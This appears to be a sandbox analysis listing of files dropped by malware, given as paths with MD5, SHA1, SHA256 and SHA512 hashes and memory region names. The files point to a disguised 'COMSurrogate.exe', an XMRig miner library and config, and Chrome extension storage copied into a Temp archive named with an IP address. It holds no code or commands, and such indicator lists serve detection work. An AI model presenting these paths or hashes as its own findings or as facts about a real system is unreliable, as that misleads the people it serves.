C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 269e0a97c12ce949f92dd3effcd6bdbe
SHA1 42bb1c608a4a93f8cf81b00889f67b2ca56d6376
SHA256 ba5d4fc7db6db73da9080c92cd11d9616f316fcf92ea15957d1c8134877700e9
SHA512 27ed9c88c3e336de77dfcda1675fe8b3a836b2d1223a87186b6082e762b707f20833b7076b9f7846c22f2d7573cc12d9166e8715d368dfa7d3e6b97ebcc0fc0c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70de2cb7546f63571c8e182832719af3
SHA1 19720349590fd365aa0ae089752b1fcae48911a7
SHA256 82d57d80064175e85b149dd878ce0bae46ca3057176698469251a24f542c1e68
SHA512 f961787629154b40d3388fc5ab15a00d622af98b0bc1632f986e2ad42c052416bd27563c0057a8c2b645651ee3215ae29154f599f579f09047b05573ab0583fd

C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

MD5 77334f046a50530cdc6e585e59165264
SHA1 657a584eafe86df36e719526d445b570e135d217
SHA256 eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA512 97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

memory/3196-195-0x000001DA78A00000-0x000001DA78A2E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e0860c23cb3d7ae4c25c7d29fab6501b
SHA1 b74d27e25add2eeca9e737ef0e4561872a75616b
SHA256 1936fe36e6969d4deb82cf4f31aec44a9b50cbc1de2e6be681d9fe1425469121
SHA512 ce34d24d7198ad18b5ab6c700610454bc272f6cd0f7e862c4d6bbe830f9ea616d299e0cabb9a0c8d76a3d5eb285da99b47e47d825e8a504302c44b6a65c4d6db

memory/2196-207-0x0000000070610000-0x000000007065C000-memory.dmp

memory/2196-217-0x0000000007F70000-0x0000000007F82000-memory.dmp

memory/2196-218-0x0000000007ED0000-0x0000000007EDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

MD5 f67672c18281ad476bb09676baee42c4
SHA1 fb4e31c9a39545d822b2f18b0b87ca465e7768c9
SHA256 d96b3d82465808c49ce3c948745074d143504d00f44a9ff3b26a42f0c88e1f61
SHA512 ff37752848af570cb284f5fb65837472ddf9941992fffceb049a70c36d858c37e4e87016176b4e62d0eda63c235ca742411947d50d163cbc7823c50a734f0898

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG

MD5 02a1ce8f132857b9dea90f36f9b8d60a
SHA1 367958f4436ab55bdd1b083ba7a44eee741a6177
SHA256 240c74f7f3bbe07352596db3c9826c7d32c6c2bcabcd342ceb0352df6c631f02
SHA512 fc1b5f5b07e75bc02f67512d27affc82eb3e51b6383c723ea46338cd8b04fe4e72d3ad4efc6eebdc57c50b030952c07cd80ab3e89c8f9a211ca38d7dad2997a0

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.old

MD5 8fb82999aa6cbd4a917e482ceac3e681
SHA1 91fd2bda48480fbca031dbc13d4d3fef9950b81e
SHA256 79928e3a7bd43b83916fb436f044f00e0018eae1de1bd2574b63175af47d643e
SHA512 eb90e67dcbe5e164eab661ee5f17c33402c548696ceb5d24ac0c5d67bbdf13b09a9e81764721df95e6500aca44e1bc85e0cb05912cafcac272ad7abea8c497dc

C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip

MD5 32393c99b78ca955c8dad9baf2da609b
SHA1 aa624b7e1bf54b88f6c5c5c258b7f6a67cc48301
SHA256 fb4f78a3f93924e6b51b6abb46fc60c402db205231ce34e66f8052d15da03792
SHA512 ea6fdea48f206bc2375e7348e89665ec43c9807f54a6fa24811c62372e298eb3fea3cbff72a58ec6d4c264fbb5b3c1a079fb9f4e2069b0fae09d4cca8a9a6005

C:\Users\Admin\AppData\Local\asm\mi.exe

MD5 f6d520ae125f03056c4646c508218d16
SHA1 f65e63d14dd57eadb262deaa2b1a8a965a2a962c
SHA256 d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1
SHA512 d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d

memory/3172-238-0x000001A5512A0000-0x000001A5512C0000-memory.dmp

C:\Users\Admin\AppData\Local\asm\xmrig-cuda.dll

MD5 0eaba7ef81b53a938d96921fb2185c19
SHA1 9154ad5f8d24426e2ba63212461ae48db8dd9085
SHA256 9d3aa03f8a003a0142ca6bca93d8b86bc6785b5076d1d2a6528602c110d5e4eb
SHA512 0ab9caae19b9c97958b8d9084585bd4ef2857e9a6956d4cf87f57e1b25d873f911b05da3532acf15d9956286ab0b0e1606f9ea5e3f84b25f495506b0fab02569

C:\Users\Admin\AppData\Local\asm\config.json

MD5 dcb095940d9fb21102941fbeb7bbe9f7
SHA1 3c0d33b914bc5b174cd9c13427ec8700c09d96ca
SHA256 ba88bbb257474d6d7e8e9bec7a12ff826c3fa80cb019fbc92ea8d6253c2400b1
SHA512 c384a68fac9c301efd695605e6b14e1e201be687d99cc1e31c6ed2c3d17f37c28802179dd175b4aadb29a3dd6d808b203e18ee96db63a5dbcb92c9d42d2036c2